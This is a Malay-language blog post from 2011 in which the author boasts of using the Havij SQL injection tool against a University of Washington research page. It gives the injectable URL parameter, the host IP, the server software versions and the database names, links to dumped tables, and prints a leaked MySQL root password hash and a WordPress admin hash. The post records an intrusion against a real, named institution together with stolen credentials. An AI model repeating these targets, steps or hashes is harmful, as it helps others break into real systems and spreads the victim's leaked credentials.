wo.0t?? - Laman Universiti of Washington & Havij ??

Assalamuilaikum semua...salam sejahtera dan Selamat Hari Raya Aidil Adha..pada semua muslimin & muslimat ...
pagi ini Ryuz ingin menulis entri berkenaan laman Universiti of Washington yang mudah diterokai oleh seorang newbie macam Ryuz nie :) ..hehehe saja Ryuz bosan & rindu kat Misa Amane yang jauh nun disana :P


Ok teknik yang Ryuz gunakan adalah mudah yang & telah pun Ryuz jalankan pada laman Universiti of Washington mengunakan Havij SQL iNjection Tool. Lihat Screen-shot yang Ryuz lampirkan di bawah

Setelah itu kita mesti ada bug/Vuln laman tersebut
Contoh pada laman Universiti of Washington

Target: http://www.washington.edu/research/ls.php?id='18
Host IP: 140.142.11.167
Web Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
Powered-by: PHP/5.2.6
DB Server: MySQL
Current DB: limitedsubmission
Data Bases: information_schema
drupal#energy
drupal#oei
drupalBank
drupalEnergy
drupal_clinical_research_hb
drupal_infobank
limitedsubmission
mediawiki
mysql
ocms_content
omf#research
wordpress
wp_ori
wp_the_orb
wwwContent
wwwNavigation

wo.0t?? Target Vulnerable :D,Current DB:limitedsubmission.
Nampaknya target kita memang Vuln :D
hurmm ... untuk melihat apa yang ada dalam DB laman ini Klik Table> Get Table .


Contoh table yang Ryuz dah terokai
Klik SINI : http://pastehtml.com/view/bd0kpa83u.html

Ok hope korang Enjoy mengunakan Havij :)


p/s: Ryuz telah pun dapat detail user/admin kekekeke...


Detail user/admin

host: washington.edu
login: root
hash: *5131AA9105DF140BDBB40A112188C23B35C639F5
WP: admin
hash: $P$BCL7jmzj0nFwHYR0Z/tSk5ZtMMuS/2/

Tweet

Postingan terkait:

Ditulis Ryuzaki — Saturday, November 5, 2011 — Add Comment — iNFO, sekuriti